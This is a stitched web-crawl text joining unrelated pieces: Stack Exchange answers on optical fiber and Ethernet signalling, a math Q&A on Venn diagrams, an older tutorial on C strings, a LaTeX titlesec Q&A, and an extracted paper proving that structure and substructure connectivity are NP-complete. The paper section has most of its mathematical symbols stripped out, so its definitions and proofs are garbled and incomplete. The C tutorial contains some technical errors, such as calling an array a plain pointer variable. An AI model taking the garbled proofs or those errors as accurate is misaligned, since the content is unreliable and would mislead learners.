Depending on the units of the loss coefficient $\alpha$, there are two ways to calculate optical loss in a fiber, or any other uniform medium. For $\alpha$ in units of [1/length], $$\frac{P}{P_0} = e^{-\alpha_{1/km} L}$$ For $\alpha$ in units of [dB/length] $${P \over P_0} = 10^{-\alpha_{dB/km} L/10}$$ You can set these two ...
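Not from the original answer, but a quick numeric sketch of the two equivalent forms in Python (the factor $10/\ln 10 \approx 4.343$ converts between the two conventions for $\alpha$):
import math

L_km = 10.0                                   # fiber length in km
alpha_db = 0.22                               # attenuation in dB/km
alpha_per_km = alpha_db * math.log(10) / 10   # the same attenuation in 1/km

ratio_db_form = 10 ** (-alpha_db * L_km / 10)
ratio_exp_form = math.exp(-alpha_per_km * L_km)
print(ratio_db_form, ratio_exp_form)          # both are about 0.603 for this example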
5
If you want "one way data direction", you have to do it at a higher level. Various things assume bi-directional communication at the low levels, even if app-level data is only flowing one way. For example, even if you send data in only one direction over a TCP connection, there will still be packets going back and forth in both directions. You can get ...
5
In the Gigabit Ethernet world, the media access controller (MAC) communicates with the physical layer chip (PHY) through the Gigabit Medium-Independent Interface (GMII) The GMII is an 8-bit-wide interface carrying 1000 Mb/s. So its clock rate is 125 MHz. The Physical Coding Sublayer (PCS) within the PHY performs the 8b/10b encoding. So its output rate is ...
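Spelling out the arithmetic in that answer as a tiny sketch (the 8b/10b step adds a 10/8 overhead):
gmii_clock_hz = 125e6                        # GMII clock
gmii_width_bits = 8                          # bits transferred per clock on the GMII
data_rate = gmii_clock_hz * gmii_width_bits  # 1e9 bit/s = 1000 Mb/s
line_rate = data_rate * 10 / 8               # 1.25e9 baud on the wire after 8b/10b
print(data_rate, line_rate)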
5
Fiber optic does not radiate electromagnetically, but more important is that it is immune to electromagnetic interference that can cause data corruption on copper in extreme conditions. Such interference may come from the arcing of a switch being switched off under load, or can be generated by a motor under high load.
4
You could add additional modulation, it would keep the receiver devices' ALC features happy. As you have at least 3 MBit/s data rate available you have quite a lot of headroom. You could use basic FSK modulation with two tones of say 250 kHz and 1000 kHz. This would let you use a rather simple demodulator (pulse width comparator) and have less than 20% bit ...
4
Since that device includes a PHY for wired ethernet over twisted pair copper, chances are you can't directly attach it to anything but twisted pair copper ethernet. The datasheet lacks any reference to standards, so it's very likely it's been tuned to exactly and exclusively that purpose. Best thing you can do is build it for wired ethernet, then use one of ...
4
The short answer is that for the kind of work you're talking about, an oscilloscope probably isn't a particularly useful piece of equipment. An oscilloscope can be useful for things like designing/testing/measuring the design of a network adapter, to assure against doing things like running (what are supposed to be) separate lines too close to each other so ...
4
The problem here is not the feasibility of the modulation, but the ability for cables to carry high speed signals. Especially over long lengths, it is much easier (and more economical) to carry a high speed signal on an optical fiber than on an electric cable.
4
Do we use a similar filter after the photodiode to get rid of the out-of-signal-space noise, before sampling? Generally, we don't have a separate filter device or circuit. We'd rather connect the photodiode directly to a trans-impedance amplifier (TIA) chip to avoid losses due to impedance matching (the photodiode produces a current signal so we'd rather it ...
3
The primary limitation of the signal bandwidth of optical fiber is dispersion. Dispersion, as the term is used in fiber optics, is when one component of the signal propagates faster than another component. This leads to narrow input pulses stretching in duration as they propagate along the fiber, causing the fiber to act as a low-pass filter on the signal. ...
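For a feel for the numbers (an added sketch, not from the answer; it assumes chromatic dispersion dominates and uses the usual first-order estimate with D in ps/(nm·km), with example values that are merely typical for standard single-mode fiber near 1550 nm):

```python
def pulse_broadening_ps(D_ps_nm_km: float, length_km: float, linewidth_nm: float) -> float:
    """First-order chromatic-dispersion pulse-broadening estimate, in picoseconds."""
    return abs(D_ps_nm_km) * length_km * linewidth_nm

# Assumed example values: D ~ 17 ps/(nm*km), an 80 km span, 0.1 nm source linewidth.
dt = pulse_broadening_ps(17, 80, 0.1)
print(f"broadening ~ {dt:.0f} ps")
# ~136 ps, already larger than a 10 Gb/s symbol period (~100 ps),
# which is why dispersion acts as a low-pass filter on the signal.
```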
3
To make proper comparisons between fibre and cable you have to consider the photodiode at the end of the fibre to be part of the fibre, and this is the weak link in terms of noise. Typically the Hamamatsu S5973 photodiode produces a noise equivalent power (NEP) of $1.5 \times 10^{-15}$ watts per $\sqrt{\text{Hz}}$ and given that the device is good for 1 GHz the noise power ...
3
As the question is tagged with "optical-fiber", I assume you mean the damping of the fiber. In this context, both numbers cannot be equal because a damping greater than 0 dB would be equivalent to a damping factor greater than 1. A damping of 0.22 dB would mean that the input power is $10^{0.022} = 1.05$ times higher than the output power.
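For completeness (an added sketch, not part of the answer), the dB-to-linear conversion used here, checked numerically:

```python
def db_to_power_ratio(db: float) -> float:
    """Convert a power damping in dB to a linear input/output power ratio."""
    return 10 ** (db / 10)

print(db_to_power_ratio(0.22))   # ~1.052: input power about 5% higher than output
print(db_to_power_ratio(0.0))    # 1.0: 0 dB means no damping at all
```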
3
This is somewhat oversimplified, but it gets the basics right. Think of a beam of white light shining into a prism. The output will be a rainbow, which means that the different colors exit the prism at different angles. A prism will work just fine "in reverse". That is, if you take a series of lasers of different colors, place them where their colors ...
3
Yep, high speed photodiodes are the simplest way to do this. A receiver will usually consist of a photodiode and transimpedance amplifier (current in, voltage out). After that, it's just a high speed serial electrical signal, and that gets fed into clock data recovery circuitry, deserializers, etc. There can be components in front of the photodiode, though. ...
3
It is possible on 10BASE-T and 100BASE-TX, but not on 1000BASE-T because the latter uses bidirectional transmission on each pair. To enable such a mode, you need an MDIO/MDC (management) access to the PHY at least at the TX side of the one-way link, to configure it like the following: disable AUTONEG force 100BASE-TX (or 10BASE-T, but not 1000BASE-T) force ...
3
In this context, a span is the cable length between two amplifying stations.
3
SONET is kind of popular in the telecomms world, very different to ethernet, and kind of cool in its way. In reality many non ethernet uses exist, but we tend to try to use rates that are close enough to something used by either the phone company or the datacenter because economies of scale make optical modules for those line rates all kinds of cheap. ...
3
Looking at what's in the SFP modules, it may not be all that difficult to use them directly. Since the signals are AC coupled to LVDS, you'll need to communicate in a DC balanced protocol such as Manchester, which your chosen ARM may or may not support (my current favorite Microchip SAME70 does support it). And, of course, add LVDS receiver/transmitters. ...
http://math.stackexchange.com/questions/219682/mathematical-logic-and-venn-diagrams | # Mathematical Logic and venn diagrams
Okay so I'm pretty confused about how to sketch a venn diagram for this operator: ifte(a,b,c) (or this can be written a?b:c)
given a, b, c truth table and a?b:c
$$\begin{array}{c|c|c||c} a & b & c & a?b:c\\ \hline F & F & F & F\\ \hline F & F & T & T\\ \hline F & T & F & F\\ \hline F & T & T & T\\ \hline T & F & F & F\\ \hline T & F & T & F\\ \hline T & T & F & T\\ \hline T & T & T & T \end{array}$$
I hope this truth table is clear enough. Okay so I'm asked to draw a venn diagram for this. So I can see that if 'a' is true 'b' is true but 'b' can be true while 'c' is true without 'a' being true and 'c' can be true by itself. But what does this mean for a venn diagram? :/
ifte is "if-then-else"
I've added a picture explaining what's going on here. Hope it helps. – Rick Decker Oct 24 '12 at 16:09
A Venn diagram with three sets $A,B,C$ divides the universe into 8 distinct regions, as you can see in the picture below.
For example, the $A$ circle contains 4 regions: the upper region with an arrow pointing to it represents $A=true, B=false,\text{ and }C=false$, since that region is contained in $A$ but not in $B\text{ or }C$. For your function, the truth table already identifies the truth values of the points in each of the 8 regions. For each of these, place a marker in those regions where your truth table says the function evaluates to $true$, as I did in the other region pointed to by an arrow. Your function is $true$ in four cases; I've put a dot in each. (Your conventions for marking regions might differ from mine: you might want to shade them rather than placing a dot.)
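To make the region bookkeeping concrete, here is a small added enumeration (not part of the original answer) of the eight truth assignments and of where a?b:c evaluates to true; the four marked rows are exactly the regions that should get a dot:

```python
from itertools import product

def ifte(a: bool, b: bool, c: bool) -> bool:
    """if-then-else: b when a is true, otherwise c."""
    return b if a else c

for a, b, c in product([False, True], repeat=3):
    # Name the Venn region by which circles contain it
    region = (("A" if a else "") + ("B" if b else "") + ("C" if c else "")) or "outside all three"
    mark = "dot" if ifte(a, b, c) else ""
    print(f"{region:18} -> {mark}")
```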
http://www.gamedev.net/page/resources/_/technical/general-programming/string-usage-and-architecture-r2061 | • Create Account
Calling all IT Pros from Canada and Australia.. we need your help! Support our site by taking a quick sponsored surveyand win a chance at a \$50 Amazon gift card. Click here to get started!
Like
0Likes
Dislike
# String Usage and Architecture
By Andy Oxfeld | Published Mar 10 2004 12:05 PM in General Programming
# Introduction
Strings are vital to any game programming project. Strings are used for many important tasks, including outputting text, reading and writing data to and from files, multiplayer programming via
sockets, and many other uses.
Most games are currently programmed using C/C++. However, unlike languages such as Visual Basic, C++ does not include built-in support for high-level strings. Higher level strings can be used in
C++ with the Standard C++ Library's string class, the MFC library's CString class, or a custom written string class. Even still, there are many situations where standard C strings may be a better
choice -- such as when performance is needed, or for multi-platform programming, where C is commonly used. And knowing how C strings actually work will allow a programmer to utilize higher-level
string classes more effectively.
# Array and Memory Management Basics
To understand how C strings actually work, it is first important to understand basic memory management, as well as arrays.
## Basic Memory Management
There are two ways that memory is allocated in C/C++: on the stack, and on the heap. Memory is allocated on the stack when you declare a variable or array inside a function, like this:
void stackfunc()
{
char test; // This variable is allocated on the stack
char anarray[500]; // This entire array is allocated on the stack
}
Memory allocated on the stack has many advantages. First, allocating it is fast: this is important in games. Second, memory allocated on the stack is automatically freed when you are done with it.
The main disadvantage is that you must know exactly how much memory you will need at compile time.
The alternative is to allocate memory off the stack. This happens with global variables (which have static storage duration and exist for the whole run of the program), or with true heap allocation using the malloc() and free() functions (C/C++), or the new and delete
operators (C++ only). For example:
int myarray[300]; // This is a global array: it has static storage duration (it is not on the stack)
void heapfunc()
{
char* heapvar;
char* heapvar2;
char* heaparray;
int arraysize = 500;
heapvar = new char;
heaparray = new char[arraysize];
heapvar2 = (char*)malloc(sizeof(char));
delete heapvar;
delete [] heaparray;
free(heapvar2);
}
Memory used by global variables is allocated and freed for you automatically. However, if memory is allocated on the heap by using malloc/free or new/delete, you must free it
explicitly, as done in the example. Allocating memory on the heap is slower than allocating memory on the stack, but we can allocate a dynamic amount, such as here, where the amount to allocate for
heaparray is stored in an int. Also, memory allocated on the heap, unlike memory allocated on the stack, gives you explicit control over when memory is allocated and freed. Note that in the example
above, the actual pointers are still allocated on the stack -- it's the memory that they point to that is allocated on the heap.
## Arrays
Arrays are frequently taught early in most introductory computer science courses; however, their inner workings are rarely discussed in detail. To illustrate, I will use the following code
sample:
void arrayfunc()
{
int myarray[5];
}
You may be surprised to know that arrays aren't a magical data type or feature of C/C++. In this example, myarray is just a variable of type int* (a pointer to an int). But what does myarray point
to? Let's take a look at a graphic representation of myarray.
In this image, we can see that myarray is nothing more than a pointer to the FIRST element in the 5-element array. This fact will be the basis for some of our more advanced string manipulation
methods shown later in this article. This is also why passing an array to a function is fast -- you're not passing the entire contents of the array, you're just passing where the contents of the
array are stored in memory.
Also, you may not know that myarray[2] is really just shorthand for *(myarray+2). In fact, 2[myarray] works the same as myarray[2], because *(myarray+2) is the same as *(2+myarray).
# Null-Terminated Strings
## Memory Arrangement of Strings
A string in C is just an array of type char. Type char takes up 1 byte of memory per element, and can have values between -128 and 127 (but values less than 0 are rarely used). In each element of
the array, a special ANSI character code is placed to represent the character in that position in the string. These character codes are really just numbers. For example, the character A is 65, B is
66, C is 67, etc. You usually do not need to know these codes while programming; if you place a character in single-quotes, the compiler will replace it with the number that represents that
character. For example, 'A' is equivalent to 65, 'B' to 66, 'C' to 67, etc.
Note: There is an alternate standard to the one described above, called Unicode, or sometimes "wide chars". Unicode uses an array of a wider character type (such as wchar_t), rather than char. However, Unicode is
used mostly in applications, not games, and is thus beyond the scope of this article.
Standard C strings usually have another property: they are "null-terminated". That means, the element after the last character in the string is the character code 0 ('\0'). This is NOT the
printable number 0, whose character code is 48. For example, here is how the string "Hello" would be stored in memory:
Due to this trailing 0 (called a NULL character), you must make sure that the size of your char arrays is one element bigger than the maximum-length string you want to be able to use. For
example, to store the string "Hello", which is 5 characters long, we must use a char array at least 6 characters long. However, it could be longer -- any data after the trailing NULL is ignored.
Thus, in the example above, we could change the first 'l' to a NULL, leaving us with the string "He", and causing the remaining "lo" to be ignored.
## Assigning Strings by Hand
The following code example stores "Hello" in a string, albeit in a very primitive manner:
void stringfunc()
{
char str[50];
str[0] = 'H';
str[1] = 'e';
str[2] = 'l';
str[3] = 'l';
str[4] = 'o';
str[5] = 0;
}
Observe that, when constructing a string by hand, we must explicitly set the last character to NULL. Also note that we've completely ignored the contents of the string after the NULL
character.
## Using Math Operators on Strings
You may be tempted to use operators like equals (=) or addition (+) to assign or concatenate strings, as done in many languages. However, that does not work. Let's look at what happens when you
use the equals operator on a string:
void stringfunc2()
{
char str1[3];
char* str2;
str1[0] = 'H';
str1[1] = 'i';
str1[2] = 0;
str2 = str1; // Does not work as expected!
}
This example tries to do something which seems intuitive: set a string equal to the contents of another. However, as we learned in the previous section, str1 and str2 are nothing more than
pointers to the first elements of their respective strings. All that code does is cause str1 and str2 to point to the same area of memory. Thus, str2 becomes an "instance" of str1; any changes done
to str1 will change str2, and any changes done to str2 will change str1. There will actually be cases where we want to do this, as we'll see later on in this article, but this is not how you copy the
contents of one string to another.
# Basic String Functions
## String Assignment and Concatenation
The standard C library comes with a plethora of functions to manipulate strings in many ways. The two most basic ways you can manipulate strings are assignments and concatenations. We covered the
"hard way" to do assignments in the last section: by setting each element, including the trailing NULL, by hand. Here, we'll show the "hard way" to do concatenations (adding a string onto the end of
another string), by concatenating the string " World" onto the end of "Hello":
Warning: This code example is advanced. Do not worry if you do not understand it. A much simpler way to accomplish the same task will be presented shortly in the article.
void stringfunc3()
{
char str[50];
// Set to "Hello"
str[0] = 'H';
str[1] = 'e';
str[2] = 'l';
str[3] = 'l';
str[4] = 'o';
str[5] = 0;
// Concatenate " World"
// First, find the end of the string
char* strp = &str[0]; // Set a pointer to the first element
// Note that we could have done str, rather than &str[0], since str
// itself is a pointer to the first element
// Increment strp until it is equal to the trailing NULL
while (*strp) strp++;
// Now, strp is effectively a string that starts just after the last character of str!
// We can now set it to " World" just like we set str to "Hello" above.
strp[0] = ' ';
strp[1] = 'W';
strp[2] = 'o';
strp[3] = 'r';
strp[4] = 'l';
strp[5] = 'd';
strp[6] = 0;
// If you printf or cout str, you will find it is now "Hello World"
}
Note that, when concatenating " World" onto the end of "Hello", the first character of " World" overwrote the terminating NULL character, which was then re-added at the end of the new string.
## Easy String Assignment and Concatenation
It seems like a lot of work to assign and concatenate strings! Fortunately, there are two functions that make our lives a lot easier: strcpy() and strcat(). Here is the last code example rewritten
using strcpy and strcat:
void stringfunc3()
{
char str[50];
strcpy(str, "Hello");
strcat(str, " World");
}
Talk about easier! The strcpy function takes two parameters: destination string and source string (in that order). It copies the contents of source string into destination string (much like you
would expect dest = source to do). Note that rather than copying "Hello", we could have copied the contents of another string.
The strcat function concatenates the source string (the second string) onto the end of the destination string. This is much like you would expect dest += source to do.
Observe that we did not have to do anything special with the trailing NULL character. Both strcpy and strcat handle the trailing NULL character for us. We still have to ensure there is enough room
for both the string and the trailing NULL character in the array, though.
## Protecting Against Overflows
I just mentioned that you need to make sure there is enough space for the string and the trailing NULL character inside the array. But what if there isn't? What if we ask the user to type in their
name, and they type in a really long name? If we use strcpy and strcat, these functions will attempt to write past the end of the string, usually resulting in a crash. To prevent that, most string
functions, including strcpy and strcat, have so-called "counted" variants. Here is the previous function safely rewritten using counted functions:
void stringfunc3()
{
char str[50];
strncpy(str, "Hello", 49);
strncat(str, " World", 49 - strlen(str));
}
The first line isn't much changed, except we call the counted version of strcpy, which is strncpy, and pass it the maximum string length. Note that we pass it 49 rather than 50, because the
maximum string length is actually 49 (one character must be left for the trailing NULL). This tells strncpy not to copy more than 49 characters, to prevent an overflow. (One caveat: strncpy does not write the trailing NULL itself if the source is 49 characters or longer, so after a possibly truncated copy you should set str[49] = 0 yourself.)
The second line is a bit more complicated, and introduces a new function, strlen(). strlen will return an integer representing the length (not including the trailing NULL) of a string. This
function is needed because the parameter to strncat tells it how many characters to append, not how many characters the final string should be. So, we subtract from 49 the current length of the
string to find the maximum number of characters we can append.
Except in time-critical sections of code, ALWAYS use the counted variants of string functions! The rest of this article will always use counted functions where they are available.
## Comparing Strings
Just like you can't assign a string to another using equals in C/C++, you can't compare strings using == as you can with numbers. To compare strings, you must use the strcmp function. strcmp's
return value system is a bit counter-intuitive. This table shows what it returns:
| strcmp(first, second) | Return value |
| --- | --- |
| first comes before second (A-Z order) | < 0 |
| first is the same string as second | == 0 |
| first comes after second (A-Z order) | > 0 |
Here is an example of usage of strcmp:
void stringfunc4()
{
char str1[50];
char str2[50];
char str3[50];
char str4[50];
strncpy(str1, "Hi", 49);
strncpy(str2, "Hi", 49);
strncpy(str3, "Bye", 49);
strncpy(str4, "hI", 49);
if (!strcmp(str1, str2)) // This if statement is TRUE: They are equivalent
{
printf("str1 and str2 are equivalent\n");
}
if (!strcmp(str1, str3)) // This if statement is FALSE: They are NOT equivalent
{
printf("str1 and str3 are equivalent\n");
}
if (!strcmp(str1, str4)) // This if statement is FALSE: They are NOT equivalent (different case)
{
printf("str1 and str4 are equivalent\n");
}
}
Contrary to what seems obvious, strcmp actually returns 0 if the strings ARE equivalent, which is why we negated it with the ! operator. Refer to the table above for more detail on what strcmp
returns.
strcmp is also case sensitive: it will consider "Hi" as a different string than "HI", "hi", and "hI". Most architectures also have a case-insensitive version available, but it is less standard.
The function is usually called stricmp, _stricmp, or strcasecmp.
Note: We did not use the counted version of strcmp here (strncmp). This is because strcmp does not change the value of either strings. strncmp is only needed for certain situations
where you only want to compare the beginning parts of strings.
## Advanced Output: sprintf
Setting complicated strings using strcpy and strcat can get tedious. For advanced, powerful output, the sprintf function is available. In fact, it is exactly the same as the printf function,
except that it takes an extra parameter, the string to "print" to. The format specifiers of sprintf are very powerful, and beyond the scope of this article; look them up in your helpfile/manpages for
more options. Here are some examples:
void stringfunc5()
{
char str1[100];
char str2[100];
// Produces: "30 people ate 20 pieces of cheese."
snprintf(str1, 99, "%d people ate %d pieces of cheese.", 30, 20);
// Produces: "3.300000 quick brown foxes jumped over 27 lazy dogs."
snprintf(str2, 99, "%f quick %s foxes jumped over %d %s dogs.", 3.3, "brown", 27, "lazy");
}
With sprintf, it's even more important to use the counted version (snprintf) than with strcpy and strcat, because you usually won't have much of an idea how long the final string will be.
## Parsing Strings: sscanf
Parsing strings can be one of the more complicated parts of string programming. The sscanf function, similar to the keyboard scanf function, can make life a lot easier. It uses the same format
specifiers as sprintf, although integers and floats must have their addresses passed. Let's take an example:
void stringfunc6()
{
char str1[100];
char str2[100];
char str3[100];
int anint;
// Example 1: Separate words in a string
strncpy(str1, "Hello there", 99);
sscanf(str1, "%s %s", str2, str3);
// Example 2: Expects a string giving a noun, and the number of that noun present
strncpy(str1, "5 bears", 99);
sscanf(str1, "%d %s", &anint, str2);
}
Like sprintf, sscanf is a complicated function, with complex formatting options. Refer to your help file or manpages for more detail about using sscanf.
# String Manipulation Tricks
This last section describes some advanced tricks we can do with strings by playing with pointers and NULL termination characters.
## Stripping Characters from the Beginning of a String
One of the more common things to do with strings is to strip a certain number of characters off the beginning and end of a string. Here is how to strip characters off the beginning:
void stringfunc7()
{
char str1[100];
char* str2;
strncpy(str1, "The first four characters will be stripped off.", 99);
str2 = str1 + 4;
printf("%s", str2); // Prints: first four characters will be stripped off.
}
str2 is now str1, but with the first four characters stripped off. The nice thing about this method is that str1, including the first four characters, is still intact.
This method works because str1 is really just a pointer to the first character in the string. By making str2 a pointer to the fifth character, we strip off the first four characters. Here is a
graphic representation of what we just did:
Warning: Just like above, when we set one string equal to another, str2 is now an instance of str1. Thus, any changes made to str1 will affect str2, and any changes made to str2
will affect str1. Use this technique carefully.
## Stripping Characters from the End of a String
Unfortunately, strings don't operate by using pointers to the ends of strings, so we can't strip characters from the end using the same method. But, we can strip characters by adding NULL
characters before the actual end of the string, effectively changing the end. Keep in mind that all string functions assume a string has ended as soon as they hit a NULL, and ignore anything past it.
Here is an example:
void stringfunc8()
{
char str1[100];
char str2[100];
strncpy(str1, "All but the first 15 characters of this string will be stripped off.", 99);
strncpy(str2, "The last 9 characters of this string will be removed.", 99);
// Adding a NULL at the 16th element (15) leaves the first 15 (0-14) intact.
str1[15] = 0;
// Similar to the above line, but uses strlen to calculate the length.
str2[strlen(str2) - 9] = 0;
printf("%s", str1); // Prints: All but the fir
printf("%s", str2); // Prints: The last 9 characters of this string will be
}
This method is slightly less elegant than the above method, as it effectively destroys the part of the string that we strip off, unlike stripping from the beginning, which leaves the beginning
intact. In our example, with str1, we COULD later restore the string by storing the value of str1[15] in a char, and setting str1[15] to it when we wanted the string back. With str2, we would have to
save both the index (strlen(str2) - 9), as well as the value of the character at that position.
## Conclusion
As you have learned, standard C strings are powerful and complex, yet elegant. While you may prefer to use the standard C++ library string class, since it is easier to use and safer, you now have
a good idea about how things work behind the scenes.
https://tex.stackexchange.com/questions/523200/titlesec-calculate-correct-width-for-section-heading-background | # titlesec: calculate correct width for section heading background
I’m using titlesec to place section numbers in the left margin and also to apply a shaded background that spans the width of the page.
I’m now also using wrapfig, and some section headings are being wrapped around figures. How do I adjust my definition of \colorsection so that the background extends only to the right margin, rather than beyond it?
\documentclass{article}
\usepackage{titlesec}
\usepackage{mwe}
\usepackage{wrapfig}
\usepackage{graphicx}
\usepackage{xcolor}
% https://tex.stackexchange.com/questions/40034
\newcommand{\colorsection}[1]{\colorbox{blue!20}{\parbox[t]{\dimexpr\textwidth-2\fboxsep}{#1}}}
% https://tex.stackexchange.com/questions/523000
\newcommand*{\marginsecnumber}[1]{\makebox[0pt][r]{#1\hspace{6pt}}}
\titleformat{\section}{\Large\bfseries}{\marginsecnumber\thesection}{0em}{\colorsection}
\begin{document}
\section{Section}
\begin{wrapfigure}{l}{2.5in}
\includegraphics[scale=0.5]{example-image-a}
\end{wrapfigure}
Here's some example text, not too much.
\section{Another section}
\end{document}
Simply replace \textwidth with \linewidth in the definition of \colorsection:
\documentclass{article}
\usepackage{titlesec}
\usepackage{showframe}
\renewcommand{\ShowFrameLinethickness}{0.3pt}
\usepackage{mwe}
\usepackage{wrapfig}
\usepackage{graphicx}
\usepackage{xcolor}
% https://tex.stackexchange.com/questions/40034
\newcommand{\colorsection}[1]{\colorbox{blue!20}{\parbox[t]{\dimexpr\linewidth-2\fboxsep}{#1}}}
%
% https://tex.stackexchange.com/questions/523000
\newcommand*{\marginsecnumber}[1]{\makebox[0pt][r]{#1\hspace{6pt}}}
\titleformat{\section}{\Large\bfseries}{\marginsecnumber\thesection}{0em}{\colorsection}
\begin{document}
\section{Section}
\begin{wrapfigure}{l}{2.5in}
\includegraphics[scale=0.5]{example-image-a}
\end{wrapfigure}
Here's some example text, not too much.
\section{Another section}
\end{document}
• Perfect, thanks! – Roly Jan 6 at 19:44
https://deepai.org/publication/on-the-complexity-of-structure-and-substructure-connectivity-of-graphs | # On the complexity of structure and substructure connectivity of graphs
The connectivity of a graph is an important parameter to measure its reliability. Structure and substructure connectivity are two novel generalizations of the connectivity. In this paper, we characterize the complexity of determining structure and substructure connectivity of graphs, showing that they are both NP-complete.
## 1. Introduction
The graphs we consider throughout this paper are simple and undirected. Let $G=(V,E)$ be a graph, where $V$ is the vertex-set of $G$ and $E$ is the edge-set of $G$. The degree of a vertex $v$ is the number of edges incident to it, written $d_G(v)$, or $d(v)$ when the context is clear. The minimum degree of $G$ is $\delta(G)$ and the maximum degree is $\Delta(G)$.
For any subset $F\subseteq V(G)$, the closed neighborhood of $F$ is defined to be all neighbors of any vertex of $F$ together with $F$, denoted by $N_G[F]$, while the open neighborhood of $F$ is $N_G[F]\setminus F$, denoted by $N_G(F)$. If $F=\{v\}$, then we write $N_G[v]$ and $N_G(v)$, respectively. The subgraph induced by $F$ is denoted by $G[F]$. A matching of $G$ is a set of independent edges of $G$. For other standard graph notations not defined here, please refer to [1].
Lin et al. [9] introduced structure and substructure connectivity to evaluate the fault tolerance of a network from the perspective of a single vertex, as well as some special structures of the network. Let $\mathcal{F}$ be a set of pairwise disjoint connected subgraphs of $G$ and let $V(\mathcal{F})=\bigcup_{F\in\mathcal{F}}V(F)$. Then $\mathcal{F}$ is a subgraph-cut of $G$ provided that $G-V(\mathcal{F})$ is disconnected or trivial. Let $H$ be a connected subgraph of $G$; then $\mathcal{F}$ is an $H$-structure-cut if $\mathcal{F}$ is a subgraph-cut and each element in $\mathcal{F}$ is isomorphic to $H$. The $H$-structure connectivity of $G$, written $\kappa(G;H)$, is the minimum cardinality over all $H$-structure-cuts of $G$. Similarly, if $\mathcal{F}$ is a subgraph-cut and each element of $\mathcal{F}$ is isomorphic to a connected subgraph of $H$, then $\mathcal{F}$ is called an $H$-substructure-cut. The $H$-substructure connectivity of $G$, written $\kappa^s(G;H)$, is the minimum cardinality over all $H$-substructure-cuts of $G$.
Structure and substructure connectivity of some famous interconnection networks have been determined, such as the hypercube [9], the $k$-ary $n$-cube [11], the folded hypercube [12], the balanced hypercube [10], the arrangement graph [7], and alternating group graphs [8]. A natural question arises: what is the computational complexity of structure and substructure connectivity in general graphs? In this paper, we study this problem.
## 2. NP-completeness of structure connectivity
3-dimensional matching, 3DM for short, is one of the most standard NP-complete problems to prove NP-complete results. An instance of 3DM consists of three disjoint sets , and with equal cardinality , and a set of triples . For convenience, let . The question is to decide whether there is a subset covering , that is, and each element of occurs in exactly one triple of . This instance can be associated with a bipartite graph as follows. Each element of and each triple of is represented by a vertex of . There is an edge between an element and a triple if and only if the element is a member of the triple.
It has been proved in [3, 4] that 3DM is NP-complete when each element of appears in only two or three triples of , i.e., each vertex in the partite set of has degree two or three only. We shall show that the decision problem of structure connectivity is NP-complete by reducing from 3DM stated previously.
To this end, we state the following decision problem.
Problem: The -structure connectivity of an arbitrary graph.
Instance: Given a nonempty graph , a subgraph of and a positive integer .
Question: Is ?
Now we are ready to prove the following theorem.
###### Theorem 1
. The -structure connectivity is NP-complete when for any integer .
###### Proof.
Obviously, the structure connectivity problem is in NP, because we can check in polynomial time whether a set of disjoint s is a structure cut or not. It remains to show that the structure connectivity is NP-hard when for any integer . We prove this argument by reducing 3DM to it.
Let be an instance of 3DM defined previously. For convenience, let and . We make a further assumption that each vertex in the partite set of has degree two or three only.
Now we construct a graph from as follows (see Fig. 1).
Set
$$V_j=\{v_i^j \mid 1\le i\le (M+1)|T|\} \quad \text{for } j=1,2,\cdots,M-3,$$
$$\hat{V}=\bigcup_{j=1}^{M-3}V_j,$$
$$U=\{u_1,u_2,\cdots,u_{3qM}\}, \text{ and}$$
$$U'=\{u'_1,u'_2,\cdots,u'_{3qM}\}.$$
The vertex set of is . The subgraph of induced by is for each . Similarly, The subgraph induced by is vertex disjoint and the subgraph induced by is .
So the edge set of is
$$E=E(G_b)\cup (M-3)E(K_{(M+1)|T|})\cup 3qE(K_M)\cup E(K_{3qM})\cup E_t\cup E_w\cup E_z,$$
where , and .
We show that has a 3DM covering if and only if . First suppose that has a subset covering , that is, and each element of occurs in exactly one triple of . We show that . Clearly, for each vertex and hence the subgraph of induced by is isomorphic to . Thus, is a structure cut of with .
Next suppose that is a structure cut of with . We shall show that has a subset of covering . Recall that each vertex in the partite set of has degree two or three only, we may assume that the number of vertices with degree two (resp. three) in of is and (resp. ), and consequently, , which implies that .
Since each element of is a graph isomorphic to , we focus on the center vertex of . Let be the the set of center vertices of all , and let and . Since each vertex in has degree less than , any vertex in can not be center vertices of that is, . We claim that covers . Suppose on the contrary that does not cover , we shall show that is connected. Thus, two cases arise.
Case 1. . So . If there exists an edge such that and , then it is not hard to see that is connected, contradicting that is a structure cut of . Hence, all vertices in are covered by . Clearly, components in restricted on form a 3-dimensional matching of .
Case 2. . Note that for any vertex () and or 3 for any vertex (). By the structure of , each vertex in (as the center vertex of a ) can subvert at most one vertex in . Similarly, each vertex in can subvert precisely one vertex in together with three vertices in .
Since , we have . This implies that there exists an edge such that and . Obviously, after subverting vertices in , each clique either joins to or disappears, and similarly clique is decidedly joined to via one clique that joins. So is connected, a contradiction again.
This complete the proof. ∎
## 3. NP-completeness of substructure connectivity
A vertex cover of $G$ is a subset $S\subseteq V(G)$ such that for each edge $uv\in E(G)$, at least one of $u$ and $v$ belongs to $S$. The decision version of the vertex cover problem is one of Karp's 21 NP-complete problems [6] and is therefore a classical NP-complete problem.
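As a concrete illustration of the vertex cover decision problem used in this reduction (an added sketch, not from the paper; the graph and the function name are made up for the example), a brute-force check for small graphs:

```python
from itertools import combinations

def has_vertex_cover(vertices, edges, k):
    """Return True if some set of at most k vertices touches every edge."""
    for size in range(k + 1):
        for S in combinations(vertices, size):
            S = set(S)
            if all(u in S or v in S for (u, v) in edges):
                return True
    return False

# A 4-cycle needs 2 vertices to cover all of its edges:
V = [1, 2, 3, 4]
E = [(1, 2), (2, 3), (3, 4), (4, 1)]
print(has_vertex_cover(V, E, 1))  # False
print(has_vertex_cover(V, E, 2))  # True
```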
We present the decision problem of the substructure connectivity as follows.
Problem: The substructure connectivity of an arbitrary graph.
Instance: Given a nonempty graph with , a subgraph of and a positive integer .
Question: Is ?
The following lemma will be used later.
###### Theorem 2
. The -substructure connectivity is NP-complete when .
###### Proof.
Obviously, the substructure connectivity problem is in NP, because we can check in polynomial time whether a set of disjoint subgraphs of is a substructure cut. It remains to show that the substructure connectivity is NP-hard when . We prove this argument by reducing vertex cover to this problem.
Given a graph with , we construct a graph from as follows (see Fig. 2).
Set
$$V_j=\{v_i^j \mid 1\le i\le |V|\} \quad \text{for } j=1,\cdots,k+2,$$
$$\hat{V}=\bigcup_{j=1}^{k+2}V_j, \text{ and}$$
$$V=\{v_1,v_2,\cdots,v_{|V|}\}.$$
The vertex set of is . The subgraph of induced by is a complete graph for each .
So the edge set of is
$$E'=E\cup (k+2)E(K_{|V|})\cup E_t$$
where .
We show that has a vertex cover of size at most if and only if .
